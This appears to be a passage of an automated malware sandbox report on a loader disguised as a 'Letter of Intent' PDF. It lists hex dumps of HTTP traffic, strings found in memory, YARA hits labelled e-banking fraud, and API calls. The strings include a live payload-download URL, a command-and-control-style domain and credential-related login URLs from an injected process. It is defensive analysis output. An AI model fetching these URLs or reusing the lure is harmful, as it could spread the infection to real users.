            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 06 Nov 2024 19:34:09 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data 
Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 06 Nov 2024 19:34:12 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 
69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 820f1639-7703-49a9-b928-7b8dd944ccdbx-runtime: 0.020687content-length: 17134connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 
75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: cf5e617c-69d7-4f8d-a09a-87f3e3aab378x-runtime: 0.021751content-length: 17154connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 
75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: d5e43bac-84e2-4431-93f6-27b896edd65cx-runtime: 0.035128content-length: 27234connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 
75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: ybjXXpYwhPHZD.exe, 00000007.00000002.3110054215.00000000050F7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.newhopetoday.app
            Source: ybjXXpYwhPHZD.exe, 00000007.00000002.3110054215.00000000050F7000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.newhopetoday.app/f83s/
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000001.1949040328.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: xwizard.exe, 00000006.00000002.3107060521.0000000002A96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: xwizard.exe, 00000006.00000003.2527873903.0000000007AF1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: xwizard.exe, 00000006.00000002.3111351598.0000000007B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2383059837.0000000032380000.00000004.00001000.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253237778.0000000002CC5000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352648578.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmp, Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000003.2253398404.0000000002CC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002CB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.bin6
            Source: Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe, 00000002.00000002.2352587861.0000000002C78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.evolutioncosmetics.com/quarantin/luiKzhysatQzs26.binH
            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
            Source: unknownHTTPS traffic detected: 69.27.100.185:443 -> 192.168.2.4:49735 version: TLS 1.2
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 0_2_00405139 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405139

            E-Banking Fraud

            Source: Yara matchFile source: 00000006.00000002.3108057800.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3106885173.00000000028A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383463131.0000000032C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2383897911.0000000035AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3108123087.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3110054215.0000000005050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.3108036792.0000000005190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD35C0 NtCreateMutant,LdrInitializeThunk,2_2_32FD35C0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_32FD2C70
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_32FD2DF0
            Source: C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exeCode function: 2_2_32FD3090 NtSetValueKey,2_2_32FD3090
